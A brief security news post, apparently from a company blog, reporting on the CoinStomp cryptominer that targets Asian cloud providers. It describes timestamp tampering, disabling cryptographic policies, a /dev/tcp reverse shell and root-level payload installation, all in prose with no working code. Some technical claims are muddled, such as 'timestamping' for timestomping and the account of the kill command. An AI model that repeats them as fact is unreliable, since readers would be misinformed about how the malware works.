Asian Cloud Service Providers Face Threats from CoinStomp Cryptominer

Asian-Cloud-Service-Providers-Face-Threats-from-CoinStomp-Cryptominer.

CoinStomp, a new malware family that mines cryptocurrencies on cloud services, has been discovered. This malware appears to be targeting cloud service providers in Asia at the moment.

The CoinStomp: What is it ?

The findings from CoinStomp are presented below.

CoinStomp provides a number of features, including timestamping, deactivating system-wide cryptographic policies, and employing a /dev/tcp reverse shell to initiate C2 communication.

On Linux systems, the timestamping feature manipulates timestamps using the touch command and a naturally available method of building a reverse shell or C2 communication channel.

Additionally, some evidence of a cryptojacking threat group known as Xanthe has been discovered in code. According to researchers, however, the evidence was insufficient to support this allegation.

Techniques that are anti-forensic

The malware tries to mess with Linux server cryptographic policies to avoid forensic actions against itself.

These restrictions are designed to prevent malicious executables from running. As a result, before engaging in any action, authors use the kill command to disable system-wide cryptographic settings.

Furthermore, any attempt by administrators to reverse that operation ensures that the malware fulfils its objectives.

CoinStomp uses a reverse shell to connect to its C2 server in the next stage. Additional payloads are then downloaded and executed as system-wide system services with root capabilities by the script.

Binaries for creating backdoors and a bespoke version of XMRig could be included in these payloads.

Conclusion

To undermine Linux security, the attackers are eliminating cryptographic policies. The employment of anti-forensic tactics suggests that attackers are also aware of incident response systems. These capabilities demonstrate attackers’ understanding and expertise in terms of cloud security, making it a serious danger.

By IEMA IEMLabs

IEMLabs is an ISO 27001:2013 and ISO 9001:2015 certified company, we are also a proud member of EC Council, NASSCOM, Data Security Council of India (DSCI), Indian Chamber of Commerce (ICC), U.S. Chamber of Commerce, and Confederation of Indian Industry (CII). The company was established in 2016 with a vision in mind to provide Cyber Security to the digital world and make them Hack Proof. The question is why are we suddenly talking about Cyber Security and all this stuff? With the development of technology, more and more companies are shifting their business to Digital World which is resulting in the increase in Cyber Crimes.

Leave a comment

Your email address will not be published.

This site is under maintenance,
some features might not work!!!